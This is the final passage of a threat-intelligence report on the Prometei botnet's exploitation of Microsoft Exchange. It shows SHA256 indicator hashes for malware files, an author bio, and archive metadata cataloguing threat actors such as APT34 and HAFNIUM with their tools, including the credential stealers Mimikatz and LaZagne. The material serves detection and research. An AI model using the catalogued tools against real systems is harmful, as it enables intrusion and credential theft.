SHA256 Netwalker.7z\r\ne4bd40643f64ac5e8d4093bddee0e26fcc74d2c15ba98b505098d13da22015f5 SHA256 RdpcIip.exe\r\nfb8f100e646dec8f19cb439d4020b5f5f43afdc2414279296e13469f13a018ca SHA256 Miwalk\r\nf86f9d0d3ea06bd4be6ee84c09bd13e43ecfcc71653d15994a39e55c2d6bd664\r\ne961c07d534bc1cb96f159fce573fc671bd188cef8756ef32acd9afb49528331\r\nSHA256\r\nBklocal2.exe /\r\nBklocal4.exe\r\n2f114862bd999c38b69b633488bcbb6c74c9a11e28b7ef335f6c77bba32ed2d6\r\n5de7afdde08f7b8ba705c8332c693747d537fd5b1bb0e7b0c757c0f364a60eb8\r\nSHA256\r\nNethelper2.exe /\r\nNethelper4.exe\r\ndc73a88f544efc943da73c9f6535facdb61800f6205ad3dddb9adb7c6ab229ab SHA256 Windrlver.exe\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 16 of 17\n\nAbout the Author\r\nLior Rochberger\r\n \r\nLior is a senior threat researcher at Cybereason, focusing on threat hunting and malware research. Lior began her career as a\r\nteam leader in the security operations center in the Israeli Air Force where she mostly focused on incident response and\r\nmalware analysis.\r\nAll Posts by Lior Rochberger\r\nSource: https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities" ], "report_names": [ "prometei-botnet-exploiting-microsoft-exchange-vulnerabilities" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434439, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.pdf", "text": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.txt", "img": "https://archive.orkl.eu/8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1.jpg" } }